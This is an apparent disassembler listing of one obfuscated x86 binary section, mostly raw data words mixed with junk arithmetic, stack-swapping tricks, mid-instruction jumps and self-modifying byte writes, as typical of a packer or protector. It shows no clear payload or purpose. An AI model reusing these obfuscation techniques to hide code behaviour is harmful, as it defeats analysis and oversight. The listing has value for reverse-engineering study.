dd 0FFD436E9h, 816800FFh, 0E90043C6h, 0FFFFDEDBh, 0C22B0000h
dd 29E9C20Bh, 0FFFFE7h, 6C31C381h, 0C3030F54h, 874E85Bh
dd 0
dd 63EEC081h, 0F0819754h, 11B5640Eh, 5E31C081h, 0ACE89F05h
dd 0FFFFE8h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B8D3
loc_43CE38: ; CODE XREF: sub_43B8D3-A48�j
jmp loc_43C41A
; END OF FUNCTION CHUNK FOR sub_43B8D3
; ---------------------------------------------------------------------------
align 2
dw 1487h
dd 7C65A24h, 0C18B5F03h, 0FFF628E9h
db 0FFh
; ---------------------------------------------------------------------------
loc_43CE4D: ; CODE XREF: _5qvhby1c:0043BCD7�j
jnp loc_43D0A8
jnb near ptr dword_43B4E4+36h
sub edi, ecx
jmp loc_43D3AE
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43CE62: ; CODE XREF: _5qvhby1c:0043D9EC�j
mov byte ptr [edx], 8Bh
pop edx
push edi
push 5E684395h
pop edi
jmp loc_43D9F1
; ---------------------------------------------------------------------------
dw 99E8h
dd 0FFFFD4h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7FC
loc_43CE79: ; CODE XREF: sub_43B7FC:loc_43B6DD�j
mov byte ptr [ebx], 90h
pop ebx
call sub_43E10D
loc_43CE82: ; DATA XREF: sub_43B7FC:loc_43A133�o
nop
call sub_43C317
loc_43CE88: ; CODE XREF: _5qvhby1c:0043DC29�j
jmp loc_43A814
; END OF FUNCTION CHUNK FOR sub_43B7FC
; ---------------------------------------------------------------------------
align 2
loc_43CE8E: ; CODE XREF: _5qvhby1c:0043A8FD�j
jmp near ptr byte_43A525+2
; ---------------------------------------------------------------------------
db 0E9h
dd 0FFFFE8B7h, 89830F00h, 0C1000002h
db 0EEh, 0Ah
; ---------------------------------------------------------------------------
loc_43CEA2: ; CODE XREF: _5qvhby1c:loc_43D88A�j
add eax, 0AC739EFDh
push eax
push 43B118h
jmp near ptr dword_43A228+1
; ---------------------------------------------------------------------------
align 4
dword_43CEB4 dd 0DB48B951h, 0AEE90043h, 0FFFFFBh; ---------------------------------------------------------------------------
loc_43CEC0: ; CODE XREF: _5qvhby1c:0043A3D4�j
jl loc_43A211
add cl, al
jecxz short near ptr loc_43CEE3+2
push 274AAA8Ch
jmp loc_43A0BC
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_43CED5: ; CODE XREF: _5qvhby1c:0043BA5B�j
xchg edx, [esp]
pop edx
call near ptr dword_43B028+0Bh
loc_43CEDE: ; CODE XREF: _5qvhby1c:0043B4DD�j
push offset sub_43BB5F
loc_43CEE3: ; CODE XREF: _5qvhby1c:0043CEC8�j
jmp locret_43C359
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CEE8 proc near ; CODE XREF: sub_43DB36+8�j
retn
sub_43CEE8 endp
; ---------------------------------------------------------------------------
db 0E9h, 49h, 0FEh
dd 6C6FFFFh, 34875E87h, 5EFE8B24h, 6C81CF81h, 0C7C18D6Ch
dd 54C78108h, 0E901D6D6h, 75Fh, 458B0F00h
db 0F5h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_43CF13: ; CODE XREF: _5qvhby1c:loc_43CD41�j
sub edi, 15F3D6ECh
add edi, 27314EACh
rol edi, 12h
jmp loc_43AA18
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_233. PRESS KEYPAD "+" TO EXPAND]
db 0
db 68h ; h
db 5Eh ; ^
db 0DCh ;
db 0D9h ;
db 0A1h ;
db 58h ; X
db 81h ;
db 0F0h ;
db 0FDh ;
db 73h ; s
db 61h ; a
db 67h ; g
db 81h ;
db 0C0h ;
db 9
db 85h ;
db 0Dh
db 6
db 81h ;
db 0E8h ;
db 7
db 75h ; u
db 2Ch ; ,
db 4Eh ; N
db 0E9h ;
db 9Bh ;
db 0E3h ;
db 0FFh
db 0FFh
dw 0EE81h
dd 0C979F996h, 59240C87h, 685BD38Bh, 43A683h, 0FFD415E9h
dd 689C00FFh, 531B0FA7h, 6C7C15Fh, 3E36E781h, 0D1E93CE0h
dd 0FFFFD2h, 0A4E92E89h, 0FFFFF0h, 0EF733668h, 9BF081BAh
dd 305FB63h, 5DC081C5h, 8BF287B8h, 43689C00h, 59DEAAE8h
dd 0D30E9h, 57000000h, 3C87FD8Bh, 0E9EC8B24h, 0FFFFFF3Dh
; ---------------------------------------------------------------------------
loc_43CFAC: ; CODE XREF: _5qvhby1c:0043D395�p
xchg esi, [esp]
pop esi
push 7CB17CC8h
pop ecx
add ecx, 9EBD7B8Fh
rol ecx, 1Ah
call sub_43DEA4
add bl, al ; CODE XREF: _5qvhby1c:loc_43D240�j
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F1
loc_43CFC8: ; CODE XREF: sub_43B7F1-AA9�j
jmp loc_43AAD2
; END OF FUNCTION CHUNK FOR sub_43B7F1
; ---------------------------------------------------------------------------
loc_43CFCD: ; CODE XREF: _5qvhby1c:loc_43BC08�j
push offset dword_43CEB4
jmp locret_43BCBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D51D
loc_43CFD7: ; CODE XREF: sub_43D51D+6B�j
add eax, 48C6420Ah
push offset byte_43BD51
jmp near ptr unk_43ACE4
; END OF FUNCTION CHUNK FOR sub_43D51D
; ---------------------------------------------------------------------------
loc_43CFE7: ; CODE XREF: _5qvhby1c:0043ADD8�j
; _5qvhby1c:0043C48F�j
xchg ecx, [esp]
pop ecx
add edi, 3EB1DB2Dh
call near ptr loc_43DF6F+5
add [eax-1Bh], ch ; CODE XREF: _5qvhby1c:loc_43D7BF�j
; _5qvhby1c:0043D81E�j
mov dl, 0B1h
add [eax-7Fh], bl
shr bh, 1Eh
mov ds:44E08135h, al
add dword ptr ds:2A78C081h[ebp*2], 6Dh
and dl, [ebx-75h]
fucomip st, st(1)
jmp far ptr 788Bh:0FFFFFFAh
; ---------------------------------------------------------------------------
dw 0FFD3h
dd 243487FFh, 4900C65Eh, 0E32AE958h
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F1
loc_43D02A: ; CODE XREF: sub_43B7F1+1352�j
or edx, eax
jmp loc_43CBEA
; END OF FUNCTION CHUNK FOR sub_43B7F1
; ---------------------------------------------------------------------------
align 2
dw 1C6h
dd 0F0815903h, 1B450FADh, 0FFD6E9E8h, 870000FFh, 1C872414h
dd 5BD38B24h, 250E9h
db 2 dup(0)
; ---------------------------------------------------------------------------
locret_43D052: ; CODE XREF: _5qvhby1c:0043B0FF�j
retn
; ---------------------------------------------------------------------------
align 4
dd 677E900h, 0
dd 79E2815Ah, 81F1AFDFh, 1F57D7C2h, 0D2E28178h, 813B7A7Ah
dd 93F5D9F2h, 5AC20391h, 0FFDAC3E8h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
; START OF FUNCTION CHUNK FOR sub_43BEF5
loc_43D07E: ; CODE XREF: sub_43BEF5+1E22�j
jmp loc_43C434
; END OF FUNCTION CHUNK FOR sub_43BEF5
; ---------------------------------------------------------------------------
db 0E9h
dd 0FFFFF3D0h, 81F82B00h, 0CE329BC0h, 0C1FE95Eh
db 2 dup(0)
word_43D096 dw 5068h ; DATA XREF: sub_43A948:loc_43D681�o
dd 5FC7BDB1h, 0D679C781h, 890F7BC8h, 0FFFFEAA2h
; ---------------------------------------------------------------------------
loc_43D0A8: ; CODE XREF: _5qvhby1c:loc_43CE4D�j
push edx
and edx, esi
jmp loc_43D2AD
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43D0B2: ; CODE XREF: _5qvhby1c:0043D199�j
mov byte ptr [edi], 87h
pop edi
push offset word_43D476
jmp loc_43D3E5
; ---------------------------------------------------------------------------
dd 0C9C78100h, 0E98EAA85h, 0FFFFE49Dh, 0F03B0000h, 0FFF22CE9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
loc_43D0D6: ; CODE XREF: _5qvhby1c:0043B8AC�j
xchg edi, [esp]
pop edi
xchg edi, [esp]
pop edi
xchg edi, [esp]
jmp loc_43D7BF
; ---------------------------------------------------------------------------
push offset word_43BEAA
jmp locret_43BB9A
; ---------------------------------------------------------------------------
locret_43D0F0: ; CODE XREF: _5qvhby1c:loc_43BF29�j
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43D0F3: ; CODE XREF: _5qvhby1c:loc_43A27D�j
; DATA XREF: _5qvhby1c:0043D91E�w
jmp locret_43C289
; ---------------------------------------------------------------------------
dword_43D0F8 dd 0E205F081h, 0C581184Eh, 0B5896853h, 815B52E6h, 11F790CBh
; DATA XREF: _5qvhby1c:00439DEA�o
dd 0FCFEE9B2h, 8700FFFFh, 0FC5E2434h, 0FFF3D9E9h, 0E95500FFh
dd 9Fh, 0CB330000h, 0FFE6C2E9h, 8B0000FFh, 625E8ECh, 0
dd 0BEE9388Bh, 0FFFFD4h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A7DE
loc_43D140: ; CODE XREF: sub_43A7DE-7E1�j
push offset byte_43B32B
jmp nullsub_223
; END OF FUNCTION CHUNK FOR sub_43A7DE
; ---------------------------------------------------------------------------
dw 6800h
dd 77BEE0B6h, 0BDC08158h, 0C1244C74h, 42E91CC0h, 0FFFFEAh
; ---------------------------------------------------------------------------
loc_43D160: ; DATA XREF: sub_43C14F-223C�o
add edx, 0EEF04F34h
xchg edx, [esp]
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_43B7F1
loc_43D16C: ; CODE XREF: sub_43B7F1:loc_439EB4�j
; sub_43B7F1+25C8�j
mov edx, [eax]
or edx, edx
jz sub_43B7FC
jmp loc_43C574
; END OF FUNCTION CHUNK FOR sub_43B7F1
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
loc_43D17D: ; CODE XREF: _5qvhby1c:0043AA56�j
jg near ptr dword_43A25C+3
rol ebx, 9
push ecx
add eax, 56A0B1Eh
jmp loc_43AF73
; ---------------------------------------------------------------------------
align 4
loc_43D194: ; CODE XREF: _5qvhby1c:0043BCC0�j
mov edi, 43B7C3h
jmp loc_43D0B2
; ---------------------------------------------------------------------------
align 10h
loc_43D1A0: ; CODE XREF: _5qvhby1c:loc_43DB07�j
pop ebx
add ebx, 0F0EC4AF5h
or ebx, 7B3CFFAFh
rol ebx, 18h
jmp loc_43C2A4
; ---------------------------------------------------------------------------
add edx, esi
jmp sub_43DC52
; ---------------------------------------------------------------------------
dd 12E95800h, 8B00000Ah, 242C87EEh, 53D98B53h, 43B1B7BBh
dd 0DE7AE900h, 8100FFFFh, 4F3606F6h, 0D9DBE947h, 0FFFFh
; ---------------------------------------------------------------------------
locret_43D1E4: ; CODE XREF: _5qvhby1c:0043CD31�j
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A713
loc_43D1E7: ; CODE XREF: sub_43A713+B�j
jmp loc_43D9A8
; END OF FUNCTION CHUNK FOR sub_43A713
; ---------------------------------------------------------------------------
dd 18E90000h
db 0EDh, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_43D1F3: ; CODE XREF: _5qvhby1c:loc_43BA4E�j
pop ebx
sub ebx, 0C046DE66h
add ebx, 6DF8002Fh
rol ebx, 0Ch
or ebx, 7BDFFFF8h
add ebx, 8063B852h
jmp loc_43C226
; ---------------------------------------------------------------------------
not ebx
jmp loc_43A508
; ---------------------------------------------------------------------------
align 4
loc_43D21C: ; CODE XREF: _5qvhby1c:0043B4AE�j
push 43A10Ah
jmp near ptr dword_43A408+3Fh
; ---------------------------------------------------------------------------
push 43CDD8h
jmp locret_43CDB0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 2
loc_43D232: ; CODE XREF: _5qvhby1c:0043DB72�j
jmp loc_43BEE9
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B8D3
loc_43D239: ; CODE XREF: sub_43B8D3-1468�j
jmp loc_43AE88
; END OF FUNCTION CHUNK FOR sub_43B8D3
; ---------------------------------------------------------------------------
dw 0C300h
; ---------------------------------------------------------------------------
loc_43D240: ; CODE XREF: _5qvhby1c:0043B859�j
jmp near ptr loc_43CFC4+1
; ---------------------------------------------------------------------------
align 2
dw 0DEBFh
dd 0F8ED6F2h, 0FFFA0A8Ah, 0EC9FE9FFh, 0FFFFh, 0F7C08158h
dd 0F720D472h, 10000C0h, 0FE19E900h, 0CA81FFFFh, 35A67065h
dd 2E9C787h, 0FFFFE6h, 87C18B00h, 34B92404h, 0E90043A7h
dd 0FFFFFAD8h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B893
loc_43D288: ; CODE XREF: sub_43B893:loc_43A269�j
xchg ebx, [esp-8+arg_4]
call sub_43DACC
; END OF FUNCTION CHUNK FOR sub_43B893
; START OF FUNCTION CHUNK FOR sub_43B7F1
loc_43D290: ; CODE XREF: sub_43B7F1+6�j
jmp loc_43DDB3
; END OF FUNCTION CHUNK FOR sub_43B7F1
; ---------------------------------------------------------------------------
align 2
; START OF FUNCTION CHUNK FOR sub_43A470
loc_43D296: ; CODE XREF: sub_43A470+20�j
jmp nullsub_242
; END OF FUNCTION CHUNK FOR sub_43A470
; ---------------------------------------------------------------------------
db 0E9h
dd 0FFFFDDE2h, 0C00D6800h, 1BE90043h, 0FFFFCDh
db 0
; ---------------------------------------------------------------------------
loc_43D2AD: ; CODE XREF: _5qvhby1c:0043D0AB�j
cmp eax, edi
jmp near ptr dword_43BB2C+16h
; ---------------------------------------------------------------------------
loc_43D2B4: ; CODE XREF: _5qvhby1c:0043B1C2�j
xchg ecx, [esp]
pop ecx
loc_43D2B8: ; CODE XREF: _5qvhby1c:0043B8A6�j
push ecx
mov ecx, offset loc_43CCBF
jmp loc_43CCAE
; ---------------------------------------------------------------------------
db 87h
dd 5A32404h, 43A66Eh, 43C9C268h, 0F6E9E900h, 0C2D4FFFFh
dd 3103C2C1h, 850F49C2h, 0FFFFD73Bh, 0F2B6840Fh, 6DE9FFFFh
dd 2, 0BAA96800h, 14E90043h, 0C3000001h
; ---------------------------------------------------------------------------
loc_43D2FC: ; CODE XREF: _5qvhby1c:0043CAFA�j
jmp near ptr dword_43AB78+62h
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
sar edi, cl
inc dword ptr [eax]
loc_43D309: ; CODE XREF: _5qvhby1c:0043CDB8�j
push esi
pop ebp
pop esi
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DA1E
loc_43D30D: ; CODE XREF: sub_43DA1E+9�j
jmp near ptr dword_43A228+15h
; END OF FUNCTION CHUNK FOR sub_43DA1E
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_43D313: ; CODE XREF: _5qvhby1c:00439E83�j
xor esi, 0F3D4D026h
cmp esi, 43387231h
jmp loc_43DF28
; ---------------------------------------------------------------------------
dd 210850Fh, 0D7F70000h, 0FFFD12E9h, 0C1C100FFh, 0E7E1E907h
dd 0E800FFFFh, 1EDh, 0C19DC300h, 72E902CEh, 87FFFFE8h
dd 0FF5F243Ch
db 45h, 0F0h
; ---------------------------------------------------------------------------
loc_43D352: ; CODE XREF: _5qvhby1c:0043A656�j
; _5qvhby1c:loc_43DF1B�j
push offset byte_43C90B
jmp locret_43C909
; ---------------------------------------------------------------------------
dd 3C870000h, 2B466824h, 8B538B96h, 241C87D8h, 439E13B8h
dd 0E2B2E900h
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
loc_43D377: ; CODE XREF: _5qvhby1c:0043B7A5�j
mov edi, offset loc_43B664
jmp near ptr dword_439F20+15h
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
locret_43D383: ; CODE XREF: _5qvhby1c:0043C82F�j
retn
; ---------------------------------------------------------------------------
dd 0D1CCE900h, 0FFFFh
; ---------------------------------------------------------------------------
loc_43D38C: ; CODE XREF: _5qvhby1c:0043A64A�j
or eax, eax
mov [ebp+edx*2+51FFFFE5h], al
call loc_43CFAC
pop ecx
xor ecx, 0B93FC368h
cmp ecx, 0A41DF348h
jmp loc_43A820
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43D3AE: ; CODE XREF: _5qvhby1c:0043CE5B�j
push 2CC6787Bh
loc_43D3B3: ; CODE XREF: _5qvhby1c:loc_43BCC7�j
xor ecx, 1B58582h
call near ptr sub_43C14F
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
jmp locret_43B2E0
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 0FFFFF238h
db 0
byte_43D3CD db 0C6h, 7, 0Fh ; DATA XREF: sub_43B265:loc_43C127�o
dd 0C846E85Fh, 40E8FFFFh, 0FFFFE4h, 19C7C15Bh, 0FFFC02E8h
db 0FFh
; ---------------------------------------------------------------------------
loc_43D3E5: ; CODE XREF: _5qvhby1c:0043D0BB�j
jmp near ptr dword_43ADE0+41h
; ---------------------------------------------------------------------------
dw 8E0Fh
dd 0C66h, 5F243C87h, 3415C681h, 689C13Fh, 0CFAFE95Eh, 0FFFFh
dd 308B1087h, 0FFDED9E9h, 0C30000FFh
db 0
; ---------------------------------------------------------------------------
loc_43D411: ; CODE XREF: _5qvhby1c:0043B873�j
jmp locret_43BD8E
; ---------------------------------------------------------------------------
align 4
dd 569C008Bh, 0FFCABAE8h
db 0FFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A382
loc_43D421: ; CODE XREF: sub_43A382+3903�j
jmp nullsub_228
; END OF FUNCTION CHUNK FOR sub_43A382
; ---------------------------------------------------------------------------
mov ebp, 62731795h
jmp sub_43C317
; ---------------------------------------------------------------------------
dd 820F0000h, 0FFFFE6AFh, 2BDCE381h, 82E91BCEh, 0F000000h
dd 0FFD8138Ah, 0CAF2E9FFh
db 2 dup(0FFh), 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_220. PRESS KEYPAD "+" TO EXPAND]
db 0
; ---------------------------------------------------------------------------
loc_43D451: ; CODE XREF: _5qvhby1c:0043CD05�j
jmp loc_43ACD3
; ---------------------------------------------------------------------------
word_43D456 dw 0D029h ; DATA XREF: sub_43DCB5+6�o
dd 0FFE7E9E9h, 820F00FFh, 0FFFFD991h, 87F18B56h, 4A682434h
dd 0E9D6E4F9h, 500h
db 2 dup(0)
word_43D476 dw 8B56h ; DATA XREF: _5qvhby1c:0043D0B6�o
dd 243487F0h, 0FFD7FDE8h, 4D8BFFh, 0FFF558E9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
; START OF FUNCTION CHUNK FOR sub_43AE40
loc_43D48A: ; CODE XREF: sub_43AE40:loc_43B10E�j
call sub_43A713
; END OF FUNCTION CHUNK FOR sub_43AE40
; ---------------------------------------------------------------------------
db 0
dd 0C300h, 0FFF2DFE9h, 0C60000FFh, 525F8707h, 0FFF7D8E9h
dd 0BFC881FFh, 8103A315h, 8B72CEC0h, 0FDF081A4h, 5110868Bh
dd 43B99EB9h, 0D91EE900h, 0FFFFh
; ---------------------------------------------------------------------------
locret_43D4C4: ; CODE XREF: _5qvhby1c:loc_43BC2B�j
retn
; ---------------------------------------------------------------------------
db 81h, 0F2h, 36h
dd 30030A2h, 241C87C2h, 0FFFA77E8h, 520000FFh, 43CC26BAh
dd 0EF2DE900h, 3A89FFFFh, 59E9FD8Bh, 0FFFFDEh, 1FDAC2F7h
dd 95E9F9C4h, 0FFFFCCh, 0BC45968h, 24148748h, 5EC6035Ah
dd 0FFDBEEE9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
loc_43D50A: ; CODE XREF: _5qvhby1c:0043B3C0�j
mov byte ptr [eax], 87h
pop eax
mov ebx, ebp
loc_43D510: ; DATA XREF: _5qvhby1c:0043B3BB�o
xchg ebx, [esp]
jmp near ptr word_43B252+1
; ---------------------------------------------------------------------------
push 454C5A80h
; =============== S U B R O U T I N E =======================================
sub_43D51D proc near ; CODE XREF: _5qvhby1c:loc_43BF8D�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043C3DF SIZE 00000029 BYTES
; FUNCTION CHUNK AT 0043C4CB SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043C56D SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043CFD7 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043D79E SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
mov byte ptr [edi], 31h
jmp loc_43D5B3
; ---------------------------------------------------------------------------
db 2 dup(0), 33h
dd 243C87E8h, 8702C65Fh, 51F0685Ah, 42E937B8h, 0FFFFE4h
dword_43D540 dd 531075FFh, 2461668h, 0BE68535Fh, 0E9D5218Bh, 0FFFFDCD9h
; DATA XREF: _5qvhby1c:0043C360�o
dd 8B240C87h, 0C359E9h, 0FFD428E9h
db 0FFh
; ---------------------------------------------------------------------------
loc_43D561: ; CODE XREF: _5qvhby1c:0043A2E0�j
jmp near ptr dword_43A0DC+23h
; ---------------------------------------------------------------------------
dw 0F00h
; ---------------------------------------------------------------------------
cmp byte ptr [ebx-78000005h], 3Ch
and al, 5Fh
mov eax, [eax]
jmp loc_43D79E
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43D57A: ; CODE XREF: _5qvhby1c:loc_43BDB6�j
push 0DA95BBEBh
xchg edx, [esp+0]
mov eax, edx
pop edx
rol eax, 0Dh
jmp loc_43CFD7
; ---------------------------------------------------------------------------
db 2 dup(0), 0Fh
dd 2B18Ch, 0C7230000h, 0B17A6DBDh, 2A4E9D1h, 0C870000h
dd 242C8724h, 0E95DCD8Bh, 0FFFFD438h
db 2 dup(0), 0C3h
; ---------------------------------------------------------------------------
loc_43D5B3: ; CODE XREF: sub_43D51D+7�j
jmp loc_43C3DF
sub_43D51D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 2
dw 4168h
dd 5851ED2Ah, 0A63C081h, 0A8E92CAEh, 0FFFFE8h, 0DDE9FA2Bh
dd 0
dd 0E92B8900h, 0FFFFFF8Bh, 0E9C30000h, 38Fh, 0F0810000h
dd 9C33FC1h, 0C081C503h, 7F082396h, 0FFFE1FE9h, 0F70300FFh
dd 0AFE9F03Bh, 0FFFFCCh, 20E9EA8Bh
db 3 dup(0FFh)
; ---------------------------------------------------------------------------
loc_43D60B: ; DATA XREF: _5qvhby1c:0043D649�o
push esi
push 0F69D3619h
pop esi
or esi, 19759C19h
add esi, 4618A5h
jmp loc_43DBC4
; ---------------------------------------------------------------------------
align 4
dd 0EF8C8B0Fh, 0EA3BFFFFh, 0FFE0C8E9h
db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
loc_43D633: ; CODE XREF: _5qvhby1c:loc_43BCA1�j
pop esi
add edx, 2779BD53h
xor edx, 5857FB25h
rol edx, 1Ch
xor edx, 212F0E53h
push offset loc_43D60B
jmp near ptr dword_43A228+22h
; ---------------------------------------------------------------------------
align 4
dd 0FD32860Fh, 810FFFFFh, 0FFFFD127h
; ---------------------------------------------------------------------------
loc_43D660: ; CODE XREF: sub_43B7F1+2092�p
call sub_43A7DE
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43D667: ; DATA XREF: _5qvhby1c:0043DD46�o
pop ebp
retn
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 0FFFFD99Ah, 0D0A3DD68h, 243C87BCh, 1E9C78Bh, 0FFFFE0h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A948
loc_43D681: ; CODE XREF: sub_43A948:loc_43B9CA�j
push offset word_43D096
jmp nullsub_225
; END OF FUNCTION CHUNK FOR sub_43A948
; ---------------------------------------------------------------------------
align 4
loc_43D68C: ; CODE XREF: _5qvhby1c:0043C138�j
jz loc_43B20B
xchg edx, [esp]
pop edx
mov eax, [eax]
popf
push eax
pushf
jmp loc_43BDB6
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_43D6A1: ; CODE XREF: _5qvhby1c:0043BC0D�j
pop eax
rol eax, 12h
cmp eax, 0A5CAC1Dh
jmp loc_43BCF5
; =============== S U B R O U T I N E =======================================
sub_43D6B0 proc near ; CODE XREF: _5qvhby1c:0043DBCE�p
arg_0 = dword ptr 4
xchg eax, [esp+0]
pop eax
xchg edx, [esp-4+arg_0]
jmp near ptr word_43A9E2+1
sub_43D6B0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 58D0000h, 43D70Ah, 0B482B951h, 0BE90043h, 0FFFFD6h
dd 0C2546800h, 77E90043h, 53FFFFEBh, 700D7568h, 0CB815B21h
dd 0DF23EBF0h, 7E03F381h, 0D3030BC8h
; ---------------------------------------------------------------------------
pop ebx
loc_43D6F1: ; DATA XREF: _5qvhby1c:0043B6ED�o
mov edx, [edx]
jmp loc_43AA2C
; =============== S U B R O U T I N E =======================================
sub_43D6F8 proc near ; CODE XREF: _5qvhby1c:0043CBAB�j
; _5qvhby1c:0043DC15�p
xchg edx, [esp+0]
xchg ebp, [esp+0]
mov edx, ebp
pop ebp
mov byte ptr [eax], 0C3h
retn
sub_43D6F8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_43D705: ; CODE XREF: _5qvhby1c:0043B0B1�j
jmp near ptr dword_43A5AC+32h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_234. PRESS KEYPAD "+" TO EXPAND]
db 79h
dd 5868D912h, 0FFE83EE9h
db 0FFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_226. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jmp locret_43A8C9
; ---------------------------------------------------------------------------
byte_43D71B db 0Fh ; DATA XREF: sub_43DACC:loc_43AA1F�o
dd 0FFFD3D82h, 2E8FFh, 0
; ---------------------------------------------------------------------------
loc_43D728: ; CODE XREF: _5qvhby1c:0043BE91�j
xchg esi, [esp]
pop esi
jb near ptr dword_43ADE0+15h
lodsb
push edi
mov edi, offset loc_43C3E5
jmp loc_43BF8D
; ---------------------------------------------------------------------------
dw 8700h
dd 8159240Ch, 28BCCEC0h, 2C008BD5h, 34B81268h, 0C1C159B6h
dd 0E817E90Bh, 8700FFFFh, 525F243Ch, 77E9D18Bh, 0FFFFE4h
dd 0FF838B0Fh, 71E9FFFFh, 0FFFFDDh, 65E95600h, 52FFFFD4h
dd 58E9F385h, 0FFFFF0h, 0E99DFA33h, 0FFFFDB29h, 3C60000h
dd 448A5B0Fh, 558BE005h, 0CFCBE8FCh
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D51D
loc_43D79E: ; CODE XREF: sub_43D51D+56�j
jmp near ptr dword_43CA6C+2Eh
; END OF FUNCTION CHUNK FOR sub_43D51D
; ---------------------------------------------------------------------------
align 4
dd 24148700h, 6858685Ah
db 0DEh, 0BBh, 56h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B6FF
loc_43D7AF: ; CODE XREF: sub_43B6FF+4�j
mov esi, offset word_43B00A
jmp near ptr dword_43A834+56h
; END OF FUNCTION CHUNK FOR sub_43B6FF
; ---------------------------------------------------------------------------
db 0Fh, 8Ch, 32h
db 0D3h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_43D7BF: ; CODE XREF: _5qvhby1c:0043D0E1�j
jmp near ptr loc_43CFF6+1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C14F
loc_43D7C4: ; CODE XREF: sub_43C14F-1BB9�j
jmp loc_439F05
; END OF FUNCTION CHUNK FOR sub_43C14F
; ---------------------------------------------------------------------------
db 2 dup(0), 81h
dd 558BECDBh, 0D315E993h
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
locret_43D7D7: ; CODE XREF: _5qvhby1c:0043CB38�j
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43D7DA: ; CODE XREF: _5qvhby1c:0043AC2A�j
pushf
push 3A08893Eh
mov edx, 19C1CD80h
cdq
add esi, 4300D043h
push 43A2E7h
jmp loc_43C064
; ---------------------------------------------------------------------------
dw 2568h
dd 5E7D69DFh, 2982EE81h, 7A681E6Fh, 0E90043D9h, 0FFFFFDD3h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43D80E: ; CODE XREF: _5qvhby1c:0043BFEA�j
pop edx
xor ecx, 5BFB529Ch
add ecx, 0E74774A8h
xchg ecx, [esp]
jmp near ptr loc_43CFF6+1
; ---------------------------------------------------------------------------
align 4
dd 15FC6800h, 81581ACCh, 9AAA13E8h, 0E7E08148h, 0E90C98EDh
dd 0FFFFD698h, 0C62D2668h, 0DB9AE990h, 0C1C1FFFFh, 21E18104h
dd 56A6D647h, 108A7768h, 0F9E95EC1h
; ---------------------------------------------------------------------------
retf 0FFFFh
; ---------------------------------------------------------------------------
loc_43D85B: ; CODE XREF: _5qvhby1c:0043CCC1�j
add eax, 2582D9ABh
mov eax, [eax]
call sub_43C80D
; ---------------------------------------------------------------------------
dd 1AE90000h, 0FFFFDAh, 7E16F781h, 0F8E902BBh, 0FFFFD5h
; ---------------------------------------------------------------------------
